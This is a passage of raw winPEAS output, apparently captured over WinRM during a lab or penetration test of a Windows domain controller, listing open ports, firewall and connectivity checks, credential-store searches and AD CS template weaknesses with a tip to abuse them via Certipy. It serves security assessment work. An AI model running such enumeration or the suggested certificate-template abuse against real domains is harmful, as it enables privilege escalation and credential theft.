WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        1433          [::]                                        0               Listening         4476            sqlservr
1562
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        3268          [::]                                        0               Listening         652             lsass
1563
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        3269          [::]                                        0               Listening         652             lsass
1564
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        5985          [::]                                        0               Listening         4               System
1565
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        9389          [::]                                        0               Listening         2916            Microsoft.ActiveDirectory.WebServices
1566
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        47001         [::]                                        0               Listening         4               System
1567
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49664         [::]                                        0               Listening         652             lsass
1568
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49665         [::]                                        0               Listening         496             wininit
1569
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49666         [::]                                        0               Listening         1224            svchost
1570
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49667         [::]                                        0               Listening         1704            svchost
1571
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49668         [::]                                        0               Listening         652             lsass
1572
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49677         [::]                                        0               Listening         652             lsass
1573
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49678         [::]                                        0               Listening         2784            spoolsv
1574
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49681         [::]                                        0               Listening         640             services
1575
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49691         [::]                                        0               Listening         2880            certsrv
1576
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49705         [::]                                        0               Listening         2936            dns
1577
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49761         [::]                                        0               Listening         2896            dfsrs
1578
WINRM       172.16.55.128   5985   DC01               TCP        [::1]                                       53            [::]                                        0               Listening         2936            dns
1579
WINRM       172.16.55.128   5985   DC01               TCP        [::1]                                       389           [::1]                                       49679           Established       652             lsass
1580
WINRM       172.16.55.128   5985   DC01               TCP        [::1]                                       389           [::1]                                       49680           Established       652             lsass
1581
WINRM       172.16.55.128   5985   DC01               TCP        [::1]                                       389           [::1]                                       49703           Established       652             lsass
1582
WINRM       172.16.55.128   5985   DC01               TCP        [::1]                                       1434          [::]                                        0               Listening         4476            sqlservr
1583
WINRM       172.16.55.128   5985   DC01               TCP        [::1]                                       49679         [::1]                                       389             Established       2908            ismserv
1584
WINRM       172.16.55.128   5985   DC01               TCP        [::1]                                       49680         [::1]                                       389             Established       2908            ismserv
1585
WINRM       172.16.55.128   5985   DC01               TCP        [::1]                                       49703         [::1]                                       389             Established       2936            dns
1586
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                53            [::]                                        0               Listening         2936            dns
1587
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                135           [fe80::c833:192d:dba0:737%4]                50841           Established       932             svchost
1588
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                389           [fe80::c833:192d:dba0:737%4]                49715           Established       652             lsass
1589
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                389           [fe80::c833:192d:dba0:737%4]                49756           Established       652             lsass
1590
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                389           [fe80::c833:192d:dba0:737%4]                49759           Established       652             lsass
1591
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                49668         [fe80::c833:192d:dba0:737%4]                49758           Established       652             lsass
1592
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                49668         [fe80::c833:192d:dba0:737%4]                49892           Established       652             lsass
1593
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                49668         [fe80::c833:192d:dba0:737%4]                50842           Established       652             lsass
1594
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                49715         [fe80::c833:192d:dba0:737%4]                389             Established       2936            dns
1595
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                49756         [fe80::c833:192d:dba0:737%4]                389             Established       2896            dfsrs
1596
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                49758         [fe80::c833:192d:dba0:737%4]                49668           Established       2896            dfsrs
1597
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                49759         [fe80::c833:192d:dba0:737%4]                389             Established       2896            dfsrs
1598
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                49892         [fe80::c833:192d:dba0:737%4]                49668           Established       652             lsass
1599
WINRM       172.16.55.128   5985   DC01
1600
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Current UDP Listening Ports
1601
WINRM       172.16.55.128   5985   DC01             È Check for services restricted from the outside
1602
WINRM       172.16.55.128   5985   DC01               Enumerating IPv4 connections
1603
WINRM       172.16.55.128   5985   DC01
1604
WINRM       172.16.55.128   5985   DC01               Protocol   Local Address         Local Port    Remote Address:Remote Port     Process ID        Process Name
1605
WINRM       172.16.55.128   5985   DC01
1606
WINRM       172.16.55.128   5985   DC01               UDP        0.0.0.0               123           *:*                            88                svchost
1607
WINRM       172.16.55.128   5985   DC01               UDP        0.0.0.0               389           *:*                            652               lsass
1608
WINRM       172.16.55.128   5985   DC01               UDP        0.0.0.0               500           *:*                            2924              svchost
1609
WINRM       172.16.55.128   5985   DC01               UDP        0.0.0.0               4500          *:*                            2924              svchost
1610
WINRM       172.16.55.128   5985   DC01               UDP        0.0.0.0               5353          *:*                            1216              svchost
1611
WINRM       172.16.55.128   5985   DC01               UDP        0.0.0.0               5355          *:*                            1216              svchost
1612
WINRM       172.16.55.128   5985   DC01               UDP        0.0.0.0               54227         *:*                            1216              svchost
1613
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             49222         *:*                            2908              ismserv
1614
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             54226         *:*                            2916              Microsoft.ActiveDirectory.WebServices
1615
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             54228         *:*                            2896              dfsrs
1616
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             54231         *:*                            652               lsass
1617
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             54232         *:*                            1440              svchost
1618
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             59991         *:*                            1508              svchost
1619
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             60979         *:*                            2124              svchost
1620
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             63257         *:*                            2880              certsrv
1621
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             64258         *:*                            3112              dfssvc
1622
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             64542         *:*                            4176              C:\ProgramData\winPEASx64.exe
1623
WINRM       172.16.55.128   5985   DC01               UDP        172.16.55.128         88            *:*                            652               lsass
1624
WINRM       172.16.55.128   5985   DC01               UDP        172.16.55.128         137           *:*                            4                 System
1625
WINRM       172.16.55.128   5985   DC01               UDP        172.16.55.128         138           *:*                            4                 System
1626
WINRM       172.16.55.128   5985   DC01               UDP        172.16.55.128         464           *:*                            652               lsass
1627
WINRM       172.16.55.128   5985   DC01
1628
WINRM       172.16.55.128   5985   DC01               Enumerating IPv6 connections
1629
WINRM       172.16.55.128   5985   DC01
1630
WINRM       172.16.55.128   5985   DC01               Protocol   Local Address                               Local Port    Remote Address:Remote Port     Process ID        Process Name
1631
WINRM       172.16.55.128   5985   DC01
1632
WINRM       172.16.55.128   5985   DC01               UDP        [::]                                        123           *:*                            88                svchost
1633
WINRM       172.16.55.128   5985   DC01               UDP        [::]                                        389           *:*                            652               lsass
1634
WINRM       172.16.55.128   5985   DC01               UDP        [::]                                        500           *:*                            2924              svchost
1635
WINRM       172.16.55.128   5985   DC01               UDP        [::]                                        4500          *:*                            2924              svchost
1636
WINRM       172.16.55.128   5985   DC01               UDP        [::]                                        5353          *:*                            1216              svchost
1637
WINRM       172.16.55.128   5985   DC01               UDP        [::]                                        5355          *:*                            1216              svchost
1638
WINRM       172.16.55.128   5985   DC01               UDP        [::]                                        54227         *:*                            1216              svchost
1639
WINRM       172.16.55.128   5985   DC01               UDP        [fe80::c833:192d:dba0:737%4]                88            *:*                            652               lsass
1640
WINRM       172.16.55.128   5985   DC01               UDP        [fe80::c833:192d:dba0:737%4]                464           *:*                            652               lsass
1641
WINRM       172.16.55.128   5985   DC01
1642
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Firewall Rules
1643
WINRM       172.16.55.128   5985   DC01             È Showing only DENY rules (too many ALLOW rules always)
1644
WINRM       172.16.55.128   5985   DC01                 Current Profiles: DOMAIN
1645
WINRM       172.16.55.128   5985   DC01                 FirewallEnabled (Domain):    True
1646
WINRM       172.16.55.128   5985   DC01                 FirewallEnabled (Private):    True
1647
WINRM       172.16.55.128   5985   DC01                 FirewallEnabled (Public):    True
1648
WINRM       172.16.55.128   5985   DC01                 DENY rules:
1649
WINRM       172.16.55.128   5985   DC01
1650
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ DNS cached --limit 70--
1651
WINRM       172.16.55.128   5985   DC01                 Entry                                 Name                                  Data
1652
WINRM       172.16.55.128   5985   DC01               [X] Exception: Access denied
1653
WINRM       172.16.55.128   5985   DC01
1654
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Internet settings, zone and proxy configuration
1655
WINRM       172.16.55.128   5985   DC01               General Settings
1656
WINRM       172.16.55.128   5985   DC01               Hive        Key                                       Value
1657
WINRM       172.16.55.128   5985   DC01               HKCU        CertificateRevocation                     1
1658
WINRM       172.16.55.128   5985   DC01               HKCU        DisableCachingOfSSLPages                  0
1659
WINRM       172.16.55.128   5985   DC01               HKCU        IE5_UA_Backup_Flag                        5.0
1660
WINRM       172.16.55.128   5985   DC01               HKCU        PrivacyAdvanced                           1
1661
WINRM       172.16.55.128   5985   DC01               HKCU        SecureProtocols                           10240
1662
WINRM       172.16.55.128   5985   DC01               HKCU        User Agent                                Mozilla/4.0 (compatible; MSIE 8.0; Win32)
1663
WINRM       172.16.55.128   5985   DC01               HKCU        ZonesSecurityUpgrade                      System.Byte[]
1664
WINRM       172.16.55.128   5985   DC01               HKLM        ActiveXCache                              C:\Windows\Downloaded Program Files
1665
WINRM       172.16.55.128   5985   DC01               HKLM        CodeBaseSearchPath                        CODEBASE
1666
WINRM       172.16.55.128   5985   DC01               HKLM        EnablePunycode                            1
1667
WINRM       172.16.55.128   5985   DC01               HKLM        MinorVersion                              0
1668
WINRM       172.16.55.128   5985   DC01               HKLM        WarnOnIntranet                            1
1669
WINRM       172.16.55.128   5985   DC01
1670
WINRM       172.16.55.128   5985   DC01               Zone Maps
1671
WINRM       172.16.55.128   5985   DC01               No URLs configured
1672
WINRM       172.16.55.128   5985   DC01
1673
WINRM       172.16.55.128   5985   DC01               Zone Auth Settings
1674
WINRM       172.16.55.128   5985   DC01               No Zone Auth Settings
1675
WINRM       172.16.55.128   5985   DC01
1676
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Internet Connectivity
1677
WINRM       172.16.55.128   5985   DC01             È Checking if internet access is possible via different methods
1678
WINRM       172.16.55.128   5985   DC01                 HTTP (80) Access: Accessible
1679
WINRM       172.16.55.128   5985   DC01                 HTTPS (443) Access: Not Accessible
1680
WINRM       172.16.55.128   5985   DC01               [X] Exception:       Error: TCP connect timed out
1681
WINRM       172.16.55.128   5985   DC01                 HTTPS (443) Access by Domain Name: Not Accessible
1682
WINRM       172.16.55.128   5985   DC01               [X] Exception:       Error: A task was canceled.
1683
WINRM       172.16.55.128   5985   DC01                 DNS (53) Access: Accessible
1684
WINRM       172.16.55.128   5985   DC01                 ICMP (ping) Access: Accessible
1685
WINRM       172.16.55.128   5985   DC01
1686
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Hostname Resolution
1687
WINRM       172.16.55.128   5985   DC01             È Checking if the hostname can be resolved externally
1688
WINRM       172.16.55.128   5985   DC01               [X] Exception:     Error during hostname check: A task was canceled.
1689
WINRM       172.16.55.128   5985   DC01
1690
WINRM       172.16.55.128   5985   DC01
1691
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Active Directory Quick Checks ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
1692
WINRM       172.16.55.128   5985   DC01
1693
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ gMSA readable managed passwords
1694
WINRM       172.16.55.128   5985   DC01             È Look for Group Managed Service Accounts you can read (msDS-ManagedPassword) https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/gmsa.html
1695
WINRM       172.16.55.128   5985   DC01               [-] No gMSA with readable managed password found (checked 0).
1696
WINRM       172.16.55.128   5985   DC01
1697
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ AD CS misconfigurations for ESC
1698
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/ad-certificates.html
1699
WINRM       172.16.55.128   5985   DC01             È Check for ADCS misconfigurations in the local DC registry
1700
WINRM       172.16.55.128   5985   DC01               StrongCertificateBindingEnforcement:  - Allow weak mapping if SID extension missing, may be vulnerable to ESC9.
1701
WINRM       172.16.55.128   5985   DC01               CertificateMappingMethods:  - Strong Certificate mapping enabled.
1702
WINRM       172.16.55.128   5985   DC01               IF_ENFORCEENCRYPTICERTREQUEST set in InterfaceFlags - not vulnerable to ESC11.
1703
WINRM       172.16.55.128   5985   DC01               szOID_NTDS_CA_SECURITY_EXT not disabled for the CA - not vulnerable to ESC16.
1704
WINRM       172.16.55.128   5985   DC01             È
1705
WINRM       172.16.55.128   5985   DC01             If you can modify a template (WriteDacl/WriteOwner/GenericAll), you can abuse ESC4
1706
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: User  (Rights: WriteProperty,ExtendedRight)
1707
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: UserSignature  (Rights: WriteProperty,ExtendedRight)
1708
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: ClientAuth  (Rights: WriteProperty,ExtendedRight)
1709
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: EFS  (Rights: WriteProperty,ExtendedRight)
1710
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: login  (Rights: ExtendedRight)
1711
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: IT-login  (Rights: ExtendedRight)
1712
WINRM       172.16.55.128   5985   DC01               [*] Tip: Abuse with tools like Certipy (template write -> ESC1 -> enroll).
1713
WINRM       172.16.55.128   5985   DC01
1714
WINRM       172.16.55.128   5985   DC01
1715
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Cloud Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
1716
WINRM       172.16.55.128   5985   DC01             Learn and practice cloud hacking in training.hacktricks.xyz
1717
WINRM       172.16.55.128   5985   DC01             AWS EC2?                                No
1718
WINRM       172.16.55.128   5985   DC01             Azure VM?                               No
1719
WINRM       172.16.55.128   5985   DC01             Azure Tokens?                           No
1720
WINRM       172.16.55.128   5985   DC01             Google Cloud Platform?                  No
1721
WINRM       172.16.55.128   5985   DC01             Google Workspace Joined?                No
1722
WINRM       172.16.55.128   5985   DC01             Google Cloud Directory Sync?            No
1723
WINRM       172.16.55.128   5985   DC01             Google Password Sync?                   No
1724
WINRM       172.16.55.128   5985   DC01
1725
WINRM       172.16.55.128   5985   DC01
1726
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Windows Credentials ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
1727
WINRM       172.16.55.128   5985   DC01
1728
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking Windows Vault
1729
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#credentials-manager--windows-vault
1730
WINRM       172.16.55.128   5985   DC01               [ERROR] Unable to enumerate vaults. Error (0x1061)
1731
WINRM       172.16.55.128   5985   DC01                 Not Found
1732
WINRM       172.16.55.128   5985   DC01
1733
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking Credential manager
1734
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#credentials-manager--windows-vault
1735
WINRM       172.16.55.128   5985   DC01                 [!] Warning: if password contains non-printable characters, it will be printed as unicode base64 encoded string
1736
WINRM       172.16.55.128   5985   DC01
1737
WINRM       172.16.55.128   5985   DC01
1738
WINRM       172.16.55.128   5985   DC01               [!] Unable to enumerate credentials automatically, error: 'Win32Exception: System.ComponentModel.Win32Exception (0x80004005): A specified logon session does not exist. It may already have been terminated'
1739
WINRM       172.16.55.128   5985   DC01             Please run:
1740
WINRM       172.16.55.128   5985   DC01             cmdkey /list
1741
WINRM       172.16.55.128   5985   DC01
1742
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Saved RDP connections
1743
WINRM       172.16.55.128   5985   DC01                 Not Found
1744
WINRM       172.16.55.128   5985   DC01
1745
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Remote Desktop Server/Client Settings
1746
WINRM       172.16.55.128   5985   DC01               RDP Server Settings
1747
WINRM       172.16.55.128   5985   DC01                 Network Level Authentication            :
1748
WINRM       172.16.55.128   5985   DC01                 Block Clipboard Redirection             :
1749
WINRM       172.16.55.128   5985   DC01                 Block COM Port Redirection              :
1750
WINRM       172.16.55.128   5985   DC01                 Block Drive Redirection                 :
1751
WINRM       172.16.55.128   5985   DC01                 Block LPT Port Redirection              :
1752
WINRM       172.16.55.128   5985   DC01                 Block PnP Device Redirection            :
1753
WINRM       172.16.55.128   5985   DC01                 Block Printer Redirection               :
1754
WINRM       172.16.55.128   5985   DC01                 Allow Smart Card Redirection            :
1755
WINRM       172.16.55.128   5985   DC01
1756
WINRM       172.16.55.128   5985   DC01               RDP Client Settings
1757
WINRM       172.16.55.128   5985   DC01                 Disable Password Saving                 :       True
1758
WINRM       172.16.55.128   5985   DC01                 Restricted Remote Administration        :       False
1759
WINRM       172.16.55.128   5985   DC01
1760
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Recently run commands
1761
WINRM       172.16.55.128   5985   DC01                 Not Found
1762
WINRM       172.16.55.128   5985   DC01
1763
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking for DPAPI Master Keys
1764
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dpapi
1765
WINRM       172.16.55.128   5985   DC01                 Not Found
1766
WINRM       172.16.55.128   5985   DC01
1767
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking for DPAPI Credential Files
1768
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dpapi
1769
WINRM       172.16.55.128   5985   DC01                 Not Found
1770
WINRM       172.16.55.128   5985   DC01
1771
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking for RDCMan Settings Files
1772
WINRM       172.16.55.128   5985   DC01             È Dump credentials from Remote Desktop Connection Manager https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#remote-desktop-credential-manager
1773
WINRM       172.16.55.128   5985   DC01                 Not Found
1774
WINRM       172.16.55.128   5985   DC01
1775
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for Kerberos tickets
1776
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-kerberos-88/index.html
1777
WINRM       172.16.55.128   5985   DC01                 Not Found
1778
WINRM       172.16.55.128   5985   DC01
1779
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for saved Wifi credentials
1780
WINRM       172.16.55.128   5985   DC01               [X] Exception: Unable to load DLL 'wlanapi.dll': The specified module could not be found. (Exception from HRESULT: 0x8007007E)
1781
WINRM       172.16.55.128   5985   DC01             Enumerating WLAN using wlanapi.dll failed, trying to enumerate using 'netsh'
1782
WINRM       172.16.55.128   5985   DC01             No saved Wifi credentials found
1783
WINRM       172.16.55.128   5985   DC01
1784
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking AppCmd.exe
1785
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#appcmdexe
1786
WINRM       172.16.55.128   5985   DC01                 Not Found
1787
WINRM       172.16.55.128   5985   DC01                   You must be an administrator to run this check
1788
WINRM       172.16.55.128   5985   DC01
1789
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking SSClient.exe
1790
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#scclient--sccm
1791
WINRM       172.16.55.128   5985   DC01                 Not Found
1792
WINRM       172.16.55.128   5985   DC01
1793
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating SSCM - System Center Configuration Manager settings
1794
WINRM       172.16.55.128   5985   DC01
1795
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Security Packages Credentials
1796
WINRM       172.16.55.128   5985   DC01               [X] Exception: Couldn't parse nt_resp. Len: 0 Message bytes: 4e544c4d5353500003000000010001006000000000000000610000000000000058000000000000005800000008000800580000000000000061000000058a80a20a007c4f0000000fec9029b388ebc309b00eccb201a4c1f3440043003000310000
1797
WINRM       172.16.55.128   5985   DC01
1798
WINRM       172.16.55.128   5985   DC01
1799
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Browsers Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
1800
WINRM       172.16.55.128   5985   DC01
1801
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing saved credentials for Firefox
1802
WINRM       172.16.55.128   5985   DC01                 Info: if no credentials were listed, you might need to close the browser and try again.
1803
WINRM       172.16.55.128   5985   DC01
1804
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for Firefox DBs
1805
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
1806
WINRM       172.16.55.128   5985   DC01                 Not Found
1807
WINRM       172.16.55.128   5985   DC01
1808
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for GET credentials in Firefox history
1809
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
1810
WINRM       172.16.55.128   5985   DC01                 Not Found
1811
WINRM       172.16.55.128   5985   DC01
1812
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing saved credentials for Chrome
1813
WINRM       172.16.55.128   5985   DC01                 Info: if no credentials were listed, you might need to close the browser and try again.
1814
WINRM       172.16.55.128   5985   DC01
1815
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for Chrome DBs
1816
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
1817
WINRM       172.16.55.128   5985   DC01                 Not Found
1818
WINRM       172.16.55.128   5985   DC01
1819
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for GET credentials in Chrome history
1820
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
1821
WINRM       172.16.55.128   5985   DC01                 Not Found
1822
WINRM       172.16.55.128   5985   DC01
1823
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Chrome bookmarks
1824
WINRM       172.16.55.128   5985   DC01                 Not Found
1825
WINRM       172.16.55.128   5985   DC01
1826
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing saved credentials for Opera
1827
WINRM       172.16.55.128   5985   DC01                 Info: if no credentials were listed, you might need to close the browser and try again.
1828
WINRM       172.16.55.128   5985   DC01
1829
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing saved credentials for Brave Browser
1830
WINRM       172.16.55.128   5985   DC01                 Info: if no credentials were listed, you might need to close the browser and try again.
1831
WINRM       172.16.55.128   5985   DC01
1832
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing saved credentials for Internet Explorer (unsupported)
1833
WINRM       172.16.55.128   5985   DC01                 Info: if no credentials were listed, you might need to close the browser and try again.
1834
WINRM       172.16.55.128   5985   DC01
1835
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Current IE tabs
1836
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
1837
WINRM       172.16.55.128   5985   DC01               [X] Exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Runtime.InteropServices.COMException: The server process could not be started because the configured identity is incorrect. Check the username and password.
1838
WINRM       172.16.55.128   5985   DC01
1839
WINRM       172.16.55.128   5985   DC01                --- End of inner exception stack trace ---
1840
WINRM       172.16.55.128   5985   DC01                at System.RuntimeType.InvokeDispMethod(String name, BindingFlags invokeAttr, Object target, Object[] args, Boolean[] byrefModifiers, Int32 culture, String[] namedParameters)
1841
WINRM       172.16.55.128   5985   DC01                at System.RuntimeType.InvokeMember(String name, BindingFlags bindingFlags, Binder binder, Object target, Object[] providedArgs, ParameterModifier[] modifiers, CultureInfo culture, String[] namedParams)
1842
WINRM       172.16.55.128   5985   DC01                at winPEAS.KnownFileCreds.Browsers.InternetExplorer.GetCurrentIETabs()
1843
WINRM       172.16.55.128   5985   DC01                 Not Found
1844
WINRM       172.16.55.128   5985   DC01
1845
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for GET credentials in IE history
1846
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
1847
WINRM       172.16.55.128   5985   DC01
1848
WINRM       172.16.55.128   5985   DC01
1849
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ IE history -- limit 50
1850
WINRM       172.16.55.128   5985   DC01
1851
WINRM       172.16.55.128   5985   DC01                 http://go.microsoft.com/fwlink/p/?LinkId=255141
1852
WINRM       172.16.55.128   5985   DC01
1853
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ IE favorites
1854
WINRM       172.16.55.128   5985   DC01                 Not Found
1855
WINRM       172.16.55.128   5985   DC01
1856
WINRM       172.16.55.128   5985   DC01
1857
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Interesting files and registry ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
1858
WINRM       172.16.55.128   5985   DC01
1859
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Putty Sessions
1860
WINRM       172.16.55.128   5985   DC01                 Not Found
1861
WINRM       172.16.55.128   5985   DC01
1862
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Putty SSH Host keys
1863
WINRM       172.16.55.128   5985   DC01                 Not Found
1864
WINRM       172.16.55.128   5985   DC01
1865
